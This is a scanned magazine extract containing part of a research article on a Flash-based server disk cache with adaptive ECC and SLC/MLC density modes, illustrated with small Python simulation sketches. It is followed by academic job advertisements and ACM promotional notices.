Figure 6: Flash memory controller architecture. The Flash disk cache device driver sends requests to the hardware interface. These requests also specify the ECC strength and density mode of the accessed page. In turn, the controller accesses the Flash chip after performing ECC encoding for a write, or decoding for a read. The device driver software receives any requested data along with an indication of the number of failing Flash bits.

Figure 7: Optimal access latency and SLC/MLC partition for various multimode MLC Flash sizes. (Panels: (a) Financial2, working set size 443.8MB; (b) Websearch1, working set size 5116.7MB. Each plots latency in µs on the left y-axis and the optimal SLC fraction on the right y-axis against Flash die area in mm².)

Using disk activity traces from the University of Massachusetts
Trace Repository” for financial and web search
applications, we analyzed the average access latency for
different SLC/MLC partitions, for several Flash sizes.

A hybrid allocation of SLC and MLC Flash provides minimum
access latency, because it is sometimes more effective
to store heavily used data in a faster SLC page and give up
one page of storage space. Figure 7 shows the average delay
(left y-axis) achieved for an optimal partition (right y-axis)
between SLC and MLC. The x-axis shows the Flash memory
area and extends far enough to contain the entire working
set. As expected, when the size of the cache approaches
the entire workload, latency reaches a minimum using
only SLC cells. Intermediate Flash sizes provide minimum
latency through a combination of MLC and SLC with the
most frequently accessed data in the faster SLC cells. The
best division between SLC and MLC depends on the access
frequencies of the data pages. For example, if there are hot
pages that are significantly more active than other pages, the
bias will be towards SLC. This type of behavior is exhibited
by the Financial2 trace (Figure 7(a)), where the SLC allocation
grows rapidly with Flash capacity. If the access frequencies
are more uniform (e.g., Websearch1 in Figure 7(b)), it is
better to have a bigger (MLC) cache to increase the number
of accesses to Flash, because going to disk is much slower.
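The partitioning trade-off can be reproduced qualitatively with a small model. Assuming Flash capacity is measured in cell groups that hold one page in SLC mode or two pages in MLC mode, the read latencies quoted in Section 2.1, and a hypothetical 5 ms disk access, the sketch below places the hottest pages in SLC, the next-hottest in MLC, and the rest on disk, then searches for the SLC share that minimizes average latency. It ignores writes, wear, and garbage collection, and it is not the analysis used to produce Figure 7.

```python
SLC_US, MLC_US = 25.0, 50.0   # read latencies from Section 2.1
DISK_US = 5000.0              # hypothetical disk access time


def avg_latency(freqs: list[float], units: int, slc_units: int) -> float:
    """Average read latency; `freqs` are access probabilities, hottest first.
    `slc_units` groups hold one page each, the other groups two pages each."""
    mlc_pages = 2 * (units - slc_units)
    total = 0.0
    for rank, f in enumerate(freqs):
        if rank < slc_units:
            total += f * SLC_US
        elif rank < slc_units + mlc_pages:
            total += f * MLC_US
        else:
            total += f * DISK_US
    return total


def best_partition(freqs: list[float], units: int) -> tuple[int, float]:
    """Return (number of SLC groups, average latency) minimizing latency."""
    best = min(range(units + 1), key=lambda s: avg_latency(freqs, units, s))
    return best, avg_latency(freqs, units, best)


def zipf(n: int, alpha: float = 1.0) -> list[float]:
    """Zipf-like access probabilities for n pages, hottest first."""
    weights = [1.0 / (rank + 1) ** alpha for rank in range(n)]
    total = sum(weights)
    return [w / total for w in weights]
```

With these assumed numbers, a uniform access pattern and a cache much smaller than the working set favor an all-MLC configuration, since every extra cached page avoids a slow disk access, while a cache large enough to hold the whole working set in SLC favors all-SLC, mirroring the two extremes described above.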
3.3. Operation and dynamic reconfiguration
We use a typical software device driver interface to access
the Flash memory controller. The driver specifies which
Flash address is to be accessed along with the read or write
mode. For a write, the driver also sends the new data to the
controller. Using the configuration tables stored in DRAM,
the driver tells the Flash controller what error correction
strength and cell density to use for each access. In this
section we provide more details on how the cache operates and
how its settings are reconfigured on the fly.
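The driver/controller interface described above and in Figure 6 can be summarized as a request record and a response record. The sketch below is hypothetical: the field names are ours, and `ToyController` is a stand-in that stores data in a dictionary and reports an injected error count instead of running real ECC logic.

```python
from dataclasses import dataclass
from enum import Enum
from typing import Optional


class Op(Enum):
    READ = "read"
    WRITE = "write"


@dataclass(frozen=True)
class FlashRequest:
    address: int                   # Flash page address
    op: Op
    ecc_strength: int              # correctable bits, taken from the FPST
    slc_mode: bool                 # density mode, taken from the FPST
    data: Optional[bytes] = None   # payload, for writes only


@dataclass(frozen=True)
class FlashResponse:
    data: Optional[bytes]          # data read, if any
    corrected_bits: int            # errors the ECC logic had to correct


class ToyController:
    """Stand-in for the programmable controller; no real ECC or timing."""

    def __init__(self) -> None:
        self.cells: dict[int, bytes] = {}
        self.faulty_bits: dict[int, int] = {}   # injected for illustration

    def submit(self, req: FlashRequest) -> FlashResponse:
        if req.op is Op.WRITE:
            if req.data is None:
                raise ValueError("a write requires data")
            self.cells[req.address] = req.data
            return FlashResponse(None, 0)
        errors = self.faulty_bits.get(req.address, 0)
        if errors > req.ecc_strength:
            raise IOError("uncorrectable page")
        return FlashResponse(self.cells.get(req.address), errors)
```

Returning the corrected-bit count on every read is what lets the driver notice a page drifting toward its ECC limit before data is lost.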

Theory of Operation: In this section we summarize how 
the operating system and controller interact (see Kgil'' for 
a full description). The concepts are similar to ordinary disk 
caches except that it is now a two-level cache. The first level 
of cache resides in DRAM, and the second level consists of 
Flash memory. In addition, the Flash portion of the cache 
has to be reconfigured on the fly to maximize performance 
and reliability. The DRAM, with fast, uniform read and 
write latency, no wear-out and no density modes, is easier 
to handle. 

When a file read is performed, the OS searches for the 
file in the primary disk cache located in DRAM. If the page 
is found in DRAM, the file content is accessed directly 
from the primary disk cache—no access to Flash related 
data structures is required. Otherwise, the OS determines 
whether the requested file currently resides in the second- 
ary (Flash) disk cache. If the requested file is found, then 
a Flash read is performed and the Flash content is trans- 
ferred to DRAM. 

If the data is not found in Flash, we first look for an empty 
Flash page in the read cache. If there is no empty Flash 
page available, we first select a block for eviction to disk, 
freeing Flash pages for the newly read data. The data being
replaced is usually the “least recently used” (LRU) block, which
is unlikely to be needed again. If evicted data is needed again,
the access has to go all the way to disk, increasing program
execution time; choosing the LRU block reduces the likelihood
of this happening.
Concurrently, a hard disk drive access is scheduled using the 
device driver interface. The hard disk drive content is copied 
to the primary disk cache in DRAM and also the read cache 
in Flash. 
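The read path can be sketched with two LRU-ordered dictionaries standing in for the DRAM primary cache and the Flash read cache. This is a simplification under stated assumptions: capacities are counted in pages for DRAM and in blocks for Flash, the block size is a hypothetical small constant, whole Flash blocks are evicted in LRU order as the text describes, and the write region, ECC, and density modes are omitted. The disk is modeled as any function from a page number to its bytes.

```python
from collections import OrderedDict
from typing import Callable, Optional

PAGES_PER_BLOCK = 4   # hypothetical block size, kept small for illustration


class TwoLevelReadCache:
    """DRAM page cache in front of a block-organized Flash read cache."""

    def __init__(self, dram_pages: int, flash_blocks: int,
                 disk: Callable[[int], bytes]) -> None:
        self.dram: "OrderedDict[int, bytes]" = OrderedDict()   # LRU order
        self.dram_pages = dram_pages
        self.flash_blocks = flash_blocks
        self.blocks: "OrderedDict[int, dict[int, bytes]]" = OrderedDict()
        self.where: dict[int, int] = {}          # file page -> Flash block id
        self.open_id: Optional[int] = None       # block currently being filled
        self.next_id = 0
        self.disk = disk
        self.disk_reads = 0

    def read(self, page: int) -> bytes:
        if page in self.dram:                    # primary (DRAM) cache hit
            self.dram.move_to_end(page)
            return self.dram[page]
        block_id = self.where.get(page)
        if block_id is not None:                 # secondary (Flash) cache hit
            self.blocks.move_to_end(block_id)
            data = self.blocks[block_id][page]
        else:                                    # miss: read from disk and
            self.disk_reads += 1                 # copy into the Flash read cache
            data = self.disk(page)
            self._put_flash(page, data)
        self._put_dram(page, data)               # content always lands in DRAM
        return data

    def _put_dram(self, page: int, data: bytes) -> None:
        self.dram[page] = data
        self.dram.move_to_end(page)
        if len(self.dram) > self.dram_pages:
            self.dram.popitem(last=False)        # drop LRU page (clean data)

    def _put_flash(self, page: int, data: bytes) -> None:
        current = self.blocks.get(self.open_id) if self.open_id is not None else None
        if current is None or len(current) >= PAGES_PER_BLOCK:
            if len(self.blocks) >= self.flash_blocks:
                _, victim = self.blocks.popitem(last=False)   # LRU block
                for evicted_page in victim:
                    del self.where[evicted_page]
            self.open_id = self.next_id
            self.next_id += 1
            self.blocks[self.open_id] = {}
        self.blocks[self.open_id][page] = data
        self.blocks.move_to_end(self.open_id)
        self.where[page] = self.open_id
```

Evicting whole blocks rather than single pages matches the erase granularity of Flash: the freed block can be erased once and then refilled sequentially.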

If we write to a file, we typically update/access the page in 
the primary disk cache and this page is periodically sched- 
uled to be written back to the secondary disk cache and later 
periodically written back to the disk drive. When writing 
back to Flash, we first determine whether it already exists on 
Flash. If it is found in the write region, we update the page by 
doing an out-of-place write to the write cache. If it is found in 
the read cache, then we move it to the write cache. If it is not 
found in the Flash, we allocate a page in the write cache. 
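The write-back rules in the preceding paragraph reduce to a three-way decision. In this sketch the two Flash regions are dictionaries from file page to Flash page number and the page allocator is a simple counter; all names are hypothetical, and the invalidated Flash pages are only recorded, leaving their reclamation to garbage collection.

```python
from itertools import count


class SplitFlashCache:
    """Write-back rules for a Flash cache split into read and write regions."""

    def __init__(self) -> None:
        self.read_region: dict[int, int] = {}    # file page -> Flash page
        self.write_region: dict[int, int] = {}
        self.invalid: list[int] = []             # stale Flash pages awaiting GC
        self._next_free = count()                # hypothetical page allocator

    def fill_read(self, file_page: int) -> None:
        """Cache a page read from disk in the read region."""
        self.read_region[file_page] = next(self._next_free)

    def write_back(self, file_page: int) -> str:
        """Write a dirty DRAM page back to Flash and report what happened."""
        if file_page in self.write_region:
            self.invalid.append(self.write_region[file_page])
            action = "out-of-place update in write cache"
        elif file_page in self.read_region:
            self.invalid.append(self.read_region.pop(file_page))
            action = "moved from read cache to write cache"
        else:
            action = "allocated in write cache"
        self.write_region[file_page] = next(self._next_free)
        return action
```

Because every modified page ends up in the write region, the invalid pages produced by repeated updates accumulate there and leave the read region largely free of them.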

In the background, garbage collections are triggered
when the Flash-based disk cache starts to run out of space.
The cached data is also periodically flushed back to disk if it
has been modified. Concurrent with the normal cache
operation, the reliability management algorithms continuously
try to adapt the Flash configuration to provide maximum
benefit. We have already seen that the best configuration depends
on the application software. The following paragraphs describe the
configuration policies enforced to achieve this.

Reconfiguring the Flash Memory Controller: The Flash
Page Status Table (FPST) specifies the reliability control
settings for each page of Flash. When the OS reads and
writes to/from the Flash controller, it also sends configuration
bits specifying the various modes for the Flash page.
Configuration policies are applied to select those modes,
maximizing performance as the application demands
change and the Flash eventually develops faulty bits.

There are two main triggers for an ECC strength or density
mode change. These are (1) an increase in the number of
faulty bits and (2) a change in access (read) frequency. Each
trigger is explained below:

When new bit errors are observed that fail consistently
due to wear-out, we reconfigure the page. This is achieved
by enforcing a stronger ECC or reducing cell density from
MLC to SLC mode. We choose the option with the minimum
increase in latency using some simple heuristics. They take
into account how active that particular page is to determine
its impact on the system as a whole. They also consider the
current level of wear-out for the page.

Some heavily accessed pages will benefit from being in 
SLC storage simply because of its lower latency. If a page is 
in MLC mode and the entry in the FPST field that keeps track 
of the number of read accesses to a page reaches a limit, we 
migrate that Flash page to a new empty page in SLC mode. 
If there is no empty page available, a Flash block is evicted 
and erased using our wear-level aware replacement policy. 
Reassigning a frequently accessed page from MLC mode to 
SLC mode improves performance by improving hit latency. 
Because file accesses on a server platform often follow a
long-tailed (Zipf-like) distribution with hot and cold data,
improving the hit latency to frequently accessed (hot) Flash
pages improves overall performance despite the minor reduction
in Flash capacity.

If a Flash page reaches the ECC strength limit and has 
already been set to SLC mode, the block is removed permanently
and never considered when looking for pages to allocate
in a disk cache.
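The two triggers and the retirement rule can be combined into a single decision function. This sketch covers the decision logic only: the ECC limit and read-count threshold are hypothetical, the "simple heuristics" are replaced by a fixed priority order of our own (hot MLC pages go to SLC first, cold pages get stronger ECC, SLC is the fallback, then retirement), and migration to a new empty SLC page is reduced to flipping the page's mode flag.

```python
from dataclasses import dataclass

ECC_LIMIT = 12               # hypothetical maximum correctable bits
HOT_READ_THRESHOLD = 1000    # hypothetical read count that marks a hot page


@dataclass
class PageState:
    ecc_strength: int
    slc_mode: bool
    read_count: int


def reconfigure(page: PageState, new_fault: bool) -> str:
    """Apply trigger 1 (new persistent fault) or trigger 2 (read frequency)."""
    hot = page.read_count >= HOT_READ_THRESHOLD
    if new_fault:                                # trigger 1: wear-out
        if hot and not page.slc_mode:
            page.slc_mode = True                 # wider margins and faster reads
            return "switch to SLC"
        if page.ecc_strength < ECC_LIMIT:
            page.ecc_strength += 1               # extra decode time, rarely paid
            return "stronger ECC"
        if not page.slc_mode:
            page.slc_mode = True
            return "switch to SLC"
        return "retire block"                    # at ECC limit and already SLC
    if hot and not page.slc_mode:                # trigger 2: read frequency
        page.slc_mode = True
        return "migrate to SLC"
    return "no change"
```

Strengthening ECC first for cold pages keeps their MLC capacity, since the added decode latency is paid only on their rare reads; hot pages are better served by SLC, whose lower latency also helps every access.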


4. METHODOLOGY 

We evaluated the Flash memory controller and Flash device using a full-system simulator called M5. The M5 simulation infrastructure, together with published access energy data, is used to generate access profiles for estimating system memory and disk drive power consumption. Because full-system simulators are slow, we developed a separate Flash disk cache simulator for the reliability and disk cache miss rate experiments, which require very long traces. Given the limitations of our simulation infrastructure, a server workload with a working set of hundreds to thousands of gigabytes cannot easily be evaluated, so we scaled our benchmarks, system memory size, Flash size, and disk drive size accordingly.

We also generated micro-benchmark disk traces to model 
synthetic disk access behavior. They represent typical access 
distributions and approximate real disk usage. To properly 
stress the system, some micro-benchmarks with uniformly 
random and exponential distributions were also generated. 
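Synthetic block-address traces with these shapes are easy to generate. The sketch below is only an illustration of the three distributions mentioned in this section (uniform, exponential, and Zipf), not the authors' trace generator; the function names, the exponential mean, and the Zipf exponent `s` are hypothetical parameters.

```python
import random
from collections import Counter


def uniform_trace(n_blocks, n_requests, rng):
    """Every block is equally likely: no locality at all."""
    return [rng.randrange(n_blocks) for _ in range(n_requests)]


def exponential_trace(n_blocks, n_requests, rng, mean_fraction=0.05):
    """Low block numbers are hot and popularity decays exponentially.
    Rare draws beyond the end of the disk are clipped to the last block."""
    mean = mean_fraction * n_blocks
    return [min(int(rng.expovariate(1.0 / mean)), n_blocks - 1)
            for _ in range(n_requests)]


def zipf_trace(n_blocks, n_requests, rng, s=1.0):
    """The block with popularity rank r (1-based) is drawn with probability
    proportional to 1 / r**s, giving a few hot blocks and a long cold tail."""
    weights = [1.0 / rank ** s for rank in range(1, n_blocks + 1)]
    return rng.choices(range(n_blocks), weights=weights, k=n_requests)


if __name__ == "__main__":
    rng = random.Random(42)   # fixed seed so traces are reproducible
    trace = zipf_trace(n_blocks=1000, n_requests=100_000, rng=rng)
    print(Counter(trace).most_common(3))
```

Seeding a private `random.Random` instance rather than the global generator keeps each trace reproducible, which matters when comparing cache configurations on identical inputs.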

We used disk traces from the University of Massachusetts Trace Repository to model the disk behavior of enterprise-level applications such as web servers, database servers, and web search. To measure performance and power, we used dbt2 (OLTP) and SPECWeb99, which generate representative disk and disk cache traffic.


5. RESULTS 

5.1. System memory and disk energy efficiency 
Figure 8 shows a breakdown of power consumption in the system memory and disk drive (left y-axis), along with the measured network bandwidth (right y-axis). Throughput measured as network bandwidth is a good indicator of overall system performance, as it represents the amount of data the server can handle in each configuration. We calculated power for a DRAM-only system memory and for a heterogeneous (DRAM + Flash) system memory that uses Flash as a secondary disk cache backed by a hard disk drive. We assume equal die area for the DRAM-only and DRAM + Flash system memories. Figure 8 shows the reduction in disk drive power and system memory power that results from adopting Flash. Our primary power savings for system memory come from using Flash instead of DRAM for a large share of the disk cache. The power savings for the disk come from fewer disk accesses, thanks to the larger overall disk cache that Flash makes possible. We also see improved throughput with Flash because its access latency is lower than that of disk.


5.2. Impact of BCH code strength on system performance

As mentioned earlier, BCH decoding adds delay beyond the initial access latency. We simulated the SPECWeb99 and dbt2 benchmarks to observe the effect of the increasing code strength that would occur as Flash wears out, assuming that all Flash blocks have the same ECC strength applied. To capture the full performance trend, we also measured code strengths beyond our Flash memory controller's capabilities (more than 12 bits per page).

Figure 9 shows that throughput degrades slowly as ECC strength increases. Beyond 15 bits per page, dbt2 suffers a greater performance loss than SPECWeb99; its disk-bound nature makes it more sensitive to ECC strength.


5.3. Improved Flash lifetime with reliability support in Flash memory controller

Figure 10 compares the normalized number of accesses required to reach total Flash failure, the point at which none of the Flash pages can be recovered. We compare our programmable Flash memory controller with a controller using a 1-bit error-correcting BCH code. Our studies show that for typical workloads, our programmable Flash memory controller extends lifetime by a factor of 20 on average. For a workload that would previously limit Flash lifetime to 6 months, we show it can now operate for more than 10 years using our programmable Flash memory controller. This was accompanied by a graceful increase in overall access latency as Flash wore out.
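As a rough consistency check, applying the average improvement factor to the six-month baseline gives:

```latex
6~\text{months} \times 20 = 120~\text{months} = 10~\text{years}
```

Since the text reports "more than 10 years" for this workload, its own improvement was presumably at least the 20x average; the per-workload factor is not given in this section.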


6. CONCLUSIONS AND FUTURE WORK 

This paper presents the challenges and opportunities in integrating Flash onto a server platform. Flash is an attractive candidate for integration because it reduces power consumption in system memories and disk drives while improving overall throughput. This in turn can reduce the operating cost of a server platform, which is a growing concern in data centers. We presented three key usage models of Flash and examined an architecture for the "extended system memory" usage model. Our proposed architecture carefully manages the Flash and uses it as a secondary disk cache split into separate read and write caches. We observed a dramatic improvement in power consumption and performance. In our simulation studies, a Flash-based disk cache improved the dbt2 database benchmark performance by over 25% while reducing memory and disk power by 44%. For a web server benchmark, performance improved by around 11% with a power reduction of 73%. These figures do not account for potentially larger system-wide energy savings obtained from speeding up system response and increasing idle time.

Figure 8: Breakdown in system memory and disk power and network bandwidth for architecture with/without a Flash-based disk cache.


' Assuming that a server can enter a low-power mode while 


APRIL 2009 VOL,52. NO,4 COMMUNICATIONS OF THE ACM 105 


research highlights 


and disk.

We also showed that a Flash memory controller with reliability support greatly improves Flash lifetime. We found that the best configuration of a Flash memory controller depends largely on the access patterns of the application. For example, the typical workload with Zipf access behavior was best served by a Flash configured so that the heavily accessed contents are located in regions composed of reliable, low-latency SLC. In general, we found that variable ECC strength gracefully extended Flash lifetime, and that configurable density minimizes the overhead of ECC. Combining all of our techniques, we saw an average 20x lifetime improvement relative to a system using only a single ECC. We believe our findings are applicable not only to Flash but also to emerging memory technology devices such as PCRAM.

New memory technologies are creating opportunities for increased performance and efficiency in the data center. These disruptive technologies are forcing architects to rethink the current system memory and storage hierarchy in a server.

Figure 9: Average throughput as a function of ECC strength. The system used 256MB of DRAM and 1GB of Flash.


© ACM 0001-0782/09/0400 $5.00 


Fraunhofer Center — Maryland 
Measurement & Knowledge Management 
Division Researcher 


The Fraunhofer Center — Maryland, a non-profit 
research institute affiliated with the University of 
Maryland, is looking for a motivated researcher/ 
analyst to join our team. This position offers a unique chance to conduct software engineering research and publish on projects that apply intellectual rigor to real-life problems and have an impact on organizations’ practices.

The qualified candidate will work in a collaborative, team-oriented environment. Work activities may include: collection of quantitative and qualitative data through interviews, surveys, analyses of work products, etc.; designing solutions for storing and analyzing such data; and designing and evaluating tools that relate such analyses to customer needs.

Candidates should have: a PhD, Master’s, or equivalent degree in a field related to software engineering; good scientific and technical writing skills; familiarity with measuring the effectiveness of software- or system-development processes, practices, or tools; good communication skills and an ability to work effectively with experts from other teams and present research results to customers; and good problem-solving skills.

For more information see http://fc-md.umd.edu/jobs

To apply please forward your CV to Forrest Shull (fshull@fc-md.umd.edu)


The Hong Kong Polytechnic University
Department of Computing

The Department invites applications for Professors/Associate Professors/Assistant Professors in Database and Information Systems / Biometrics, Computer Graphics and Multimedia / Software Engineering and Systems / Networking, Parallel and Distributed Systems. Applicants should have a PhD degree in Computing or closely related fields, a strong commitment to excellence in teaching and research, and a good research publication record. Applicants with extensive experience and a high level of achievement may be considered for the post of Professor/Associate Professor. Please visit the website at http://www.comp.polyu.edu.hk for more information about the Department. Salary offered will be commensurate with qualifications and experience. Initial appointments will be made on a fixed-term gratuity-bearing contract. Re-engagement thereafter is subject to mutual agreement. Remuneration package will be highly competitive. Applicants should state their current and expected salary in the application. Please submit your application via email to hrstaff@polyu.edu.hk. Application forms can be downloaded from http://www.polyu.edu.hk/hro/job.htm. Recruitment will continue until the positions are filled. Details of the University’s Personal Information Collection Statement for recruitment can be found at http://www.polyu.edu.hk/hro/jobpics.htm.


ADVERTISING IN CAREER OPPORTUNITIES

How to Submit a Classified Line Ad: Send an e-mail to acmmediasales@acm.org. Please include text, and indicate the issue or issues where the ad will appear, and a contact name and number.

Estimates: An insertion order will then be e-mailed back to you. The ad will be typeset according to CACM guidelines. NO PROOFS can be sent. Classified line ads are NOT commissionable.

Rates: $325.00 for six lines of text, 40 characters per line. $32.50 for each additional line after the first six. The MINIMUM is six lines.

Deadlines: Five weeks prior to the publication date of the issue (which is the first of every month). Latest deadlines:
http://www.acm.org/publications

Career Opportunities Online: Classified and recruitment display ads receive a free duplicate listing on our website at:
http://campus.acm.org/careercenter

Ads are listed for a period of 30 days.
For More Information Contact:
ACM Media Sales
at 212-626-0654 or
acmmediasales@acm.org
Internet2
Chief Technology Officer

Internet2 is the foremost U.S. Higher Education advanced networking consortium. Led by the research and education community since 1996, Internet2 promotes the missions of its members by providing both leading-edge network capabilities and unique partnership opportunities that together facilitate the development, deployment and use of revolutionary Internet technologies. Internet2 has an opening for a Chief Technology Officer (CTO) in our Research & Development area. The CTO reports directly to the Chief Executive Officer and directs the overall advanced technology program and activities of Internet2. Visit our website at www.internet2.edu/about/staff for complete details of this and other positions.

Send curriculum vitae in electronic mail format to: jobs@internet2.edu

Internet2
Attn: 08-073
1000 Oakbrook, Suite 300
Ann Arbor, MI 48104

Internet2 is a 501(c)(3) not-for-profit organization and an equal opportunity employer.


University Corporation for 
Atmospheric Research 
Scientist I 


The Computational and Information Systems Laboratory (CISL) at the National Center for Atmospheric Research (NCAR) in Boulder, Colorado, seeks an individual to conduct research and development in the fields of computational science, scientific computing, high-performance computing, and computing systems as they relate to NCAR's mission. We are particularly interested in scientists with experience and expertise in the following areas: technologies and techniques for petascale computing, massively parallel algorithms, optimization for multi/many-core systems, accelerator technologies (e.g., GPGPUs and FPGAs), and software engineering for parallel applications.

Initial consideration will be given to applications received prior to Friday, March 13, 2009. Thereafter, applications will be reviewed on an as-needed basis. Apply online at www.ucar.edu (reference job #9028). We value diversity.

AA/EOE 

Application materials should include: a statement of research interest; a Curriculum Vitae (CV); and a list of referees from whom we may expect letters of recommendation to be sent. Please ask referees to submit their letters to: SCIO9T-DD@ucar.edu

View detailed job description at www.ucar.edu 
at the Jobs & Opportunities/Careers @ UCAR link. 
Windows Kernel Source and Curriculum Materials for Academic Teaching and Research

The Windows Academic Program from Microsoft provides the materials you need to integrate Windows kernel technology into the teaching and research of operating systems.

The program includes:
* Windows Research Kernel (WRK): Sources to build and experiment with a fully-functional version of the Windows kernel for x86 and x64 platforms, as well as the original design documents for Windows NT.
* Curriculum Resource Kit (CRK): PowerPoint slides presenting the details of the design and implementation of the Windows kernel, following the ACM/IEEE-CS OS Body of Knowledge, and including labs, exercises, quiz questions, and links to the relevant sources.
* ProjectOZ: An OS project environment based on the SPACE kernel-less OS project at UC Santa Barbara, allowing students to develop OS kernel projects in user-mode.

These materials are available at no cost, but only for non-commercial use by universities.

For more information, visit www.microsoft.com/WindowsAcademic or e-mail compsci@microsoft.com.


Announcement of an open position at the Faculty of Informatics, Vienna University of Technology, Austria

Full Professor (tenured) in Parallel Computing

The successful candidate will establish her/his own group conducting research and teaching in the area of parallel computing. Research and teaching experiences are expected to include several of the following topics:
* The design, analysis and implementation of efficient (including general purpose) parallel algorithms.
* The design and optimization of effective programming languages, models and methods for parallel programs.
* The design and analysis of parallel and high performance computing systems, such as SMP, cluster, and multi-core systems.
* The development of algorithms and environments
* Integration of parallel computing systems to modern infrastructures such as grids and clouds.
* Programming environments (including tools for semi- or automatic parallelization) for efficient development of parallel programs.

The applicant should have demonstrated her/his ability to apply the above methods in various areas of Computational Science and Engineering such as e-science and simulation.

A more detailed announcement and information on how to apply can be found at
http://www.informatics.tuwien.ac.at/PC.pdf

Application deadline: June 15, 2009


ALBERT-LUDWIGS-UNIVERSITÄT FREIBURG

The Faculty of Applied Sciences of the University of Freiburg, with its Departments of Computer Science and Microsystems Engineering, invites applications for the position of a

Full Professor (W3) in Computer Science

The successful candidate will be expected to establish a comprehensive research and teaching program in the area of pattern recognition and image processing. In addition, she/he is expected to participate in university-wide research programs, such as the Excellence Cluster BIOSS (Centre for Biological Signaling Studies).

The University of Freiburg aims to increase the representation of women in research and teaching, and therefore expressly encourages women to apply for the post. Information about the Department of Computer Science can be obtained from www.informatik.uni-freiburg.de.

Applications, including a curriculum vitae, publications list and statement of research interests, should be sent by April 30, 2009 to the Dean of the Faculty of Applied Sciences, University of Freiburg, Georges-Köhler-Allee 101, 79110 Freiburg, Germany (www.faw.uni-freiburg.de). Applicants should request an application form from the Dean’s office by emailing dekanat@faw.uni-freiburg.de
THE HONG KONG POLYTECHNIC UNIVERSITY

The Hong Kong Polytechnic University is the largest government-funded tertiary institution in Hong Kong, with a total student headcount of about 28,090, of which 14,260 are full-time students, 10,050 are part-time students, and 3,780 are mixed-mode students. It offers programmes at Doctorate, Master’s, Bachelor’s degrees and Higher Diploma levels. The University has 27 academic departments and units grouped under six faculties, as well as 2 independent schools and 2 independent research institutes. It has a full-time academic staff strength of around 1,300. The total consolidated expenditure budget of the University is in excess of HK$4 billion per year.

SCHOOL OF DESIGN
Professor / Associate Professor / Assistant Professor in Digital Media

The School of Design, as one of the top design schools in the world, is at the forefront of applying Asian innovation to global opportunities. The School is committed to sustaining excellence in design education, practice, consulting and research; to harnessing the legacy and dynamism of Asian cultures in creating solutions for human needs; and to creating strategic models for products, brands, and systems in local and global markets. The School offers a wide range of programmes at sub-degree, undergraduate and postgraduate levels in areas of Advertising Design, Digital Media, Environment and Interior Design, Industrial and Product Design, Visual Communication Design, Multimedia and Digital Entertainment, Interaction Design, Design Strategies and Practices. Its research and consultancy work are of an applied nature relevant to industrial, commercial and community needs. Please visit the website at http://www.sd.polyu.edu.hk for more information about the School.

The School is now inviting applications for a Professor / Associate Professor / Assistant Professor in Digital Media. The appointee will be in charge of the Multimedia Innovation Centre (MIC) at the School. MIC is an interdisciplinary centre dedicated to research, teaching, training, and outreach activities in the areas of Digital Media, Entertainment Technology, and Video Games. MIC's mission is to advance understanding in the design and development of new products and services in this high-innovation area. Drawing from the Centre’s interdisciplinary resources, the appointee will be involved in all aspects of initiating and orchestrating the development of the Centre.

The appointee will be required to (a) oversee the mission, staffing matters and budget of MIC; (b) oversee the Master of Science in Multimedia and Entertainment Technology Programme and develop new programmes as opportunities arise; (c) contribute to teaching at the postgraduate and/or undergraduate levels in the area of Digital Media; (d) network with other institutes and experts to establish important partnerships, share information, and expand research and outreach endeavours; (e) cultivate collaboration with other disciplines, Schools and industry partners to develop new research initiatives; and (f) provide guidance on the application of multimedia technologies and design principles to education, research, and interdisciplinary projects.

Applicants should have (a) a relevant PhD degree plus at least five years’ teaching or relevant working experience, OR a relevant master’s degree plus at least eight years’ teaching or relevant working experience, preferably with university administration and leadership experience in the areas of Multimedia, Entertainment Technology, Digital Media Design or related disciplines; (b) a distinguished record of professional, scholarly and/or academic activities and a significant background and record in scholarship and publication in Digital Media; (c) qualities of creativity, initiative and leadership; and (d) a strong commitment to excellence in teaching, research and professional service.

Applicants with less experience may be considered for appointment at the level of Assistant Professor. The job duty requirements and expectations would be in line with the appointed grade. Applicants should submit a letter of interest and their portfolios, including copies of 10 samples of their work in hardcopy, CD or memory stick format with a brief description of the work, together with the completed application.

Remuneration and Conditions of Service

Salary offered will be commensurate with qualifications and experience. Initial appointment will be made on a fixed-term gratuity-bearing contract. Re-engagement thereafter is subject to mutual agreement. Remuneration package will be highly competitive. Applicants should state their current and expected salary in the application.

Application

Please submit application form via email to hrstaff@polyu.edu.hk; by fax at (852) 2764 3374; or by mail to Human Resources Office, 13/F, Li Ka Shing Tower, The Hong Kong Polytechnic University, Hung Hom, Kowloon, Hong Kong. If you would like to provide a separate curriculum vitae, please still complete the application form, which will help speed up the recruitment process. Application forms can be obtained via the above channels or downloaded from http://www.polyu.edu.hk/hro/job.htm. Recruitment will continue until the position is filled. Details of the University’s Personal Information Collection Statement for recruitment can be found at http://www.polyu.edu.hk/hro/jobpics.htm.


NANYANG TECHNOLOGICAL UNIVERSITY

School of Physical and Mathematical Sciences

The Division of Mathematical Sciences (http://www.spms.ntu.edu.sg/mas) of the Nanyang Technological University (NTU), Singapore, is looking to add to its tenure-track faculty at all ranks. While we encourage strong candidates from all areas of Theoretical Computer Science to apply, we are particularly interested in the following areas:

* Computational Geometry
* Discrete Algorithms
* Computational Number Theory
* Network and Combinatorial Optimization
* Computational Complexity

NTU is a research university, with low teaching loads, excellent facilities, ample research funding and support for conference travel. The Division of Mathematical Sciences consists of active and talented faculty members working in a variety of areas. Its student body includes some of the best in the region. It offers undergraduate programs in mathematical sciences and mathematics & economics, and a graduate program awarding Masters and PhD degrees. Salary and benefits are competitive with the top universities around the world.

We seek people with excellent achievements in both research and teaching. Interested candidates are requested to send the following material to MASrecruit@ntu.edu.sg:

* Application Letter
* Research Statement
* Names of at least three referees
* Curriculum Vitae
* Teaching Statement

Apart from the above faculty positions, there are also 16 three-to-five year research fellowships (from fresh post-docs to senior research fellows) available. Applicants with a strong background in one of the areas of Coding/Cryptography and Computational Mathematics/Image Processing/Computer Vision are encouraged to send their application letters, detailed CVs and the names/contact emails of two references to cerg_postdoc@ntu.edu.sg (for Coding and Cryptography) or compmath@ntu.edu.sg (for Computational Mathematics/Image Processing/Computer Vision). In addition, three to five postdoc positions in Algorithmic Game Theory/Computational Social Choice are available. Interested applicants should send their detailed CVs, a research statement, and contact details of at least three referees to Prof. Elkind (eelkind@ntu.edu.sg).
Group Term Life Insurance*


10- or 20-Year Group Term
Life Insurance**


me Insurance* 


Who has time to think 
about insurance? 


Today, it’s likely you’re busier than ever. So, the last thing you probably have on your mind is 
whether or not you are properly insured. 


But in about the same time it takes to enjoy a cup of coffee, you can learn more about your 
ACM-sponsored group insurance program — a special member benefit that can help provide 
you financial security at economical group rates. 


Take just a few minutes today to make sure you’re properly insured. 


